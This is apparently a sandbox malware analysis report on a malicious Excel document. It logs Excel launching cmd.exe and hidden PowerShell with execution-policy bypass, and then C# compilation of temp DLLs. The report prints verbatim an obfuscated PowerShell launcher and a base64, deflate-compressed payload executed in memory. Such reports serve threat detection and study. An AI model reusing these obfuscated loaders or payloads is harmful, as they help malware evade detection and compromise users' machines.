Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )

Compiles C# or VB.Net code

Show sources

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
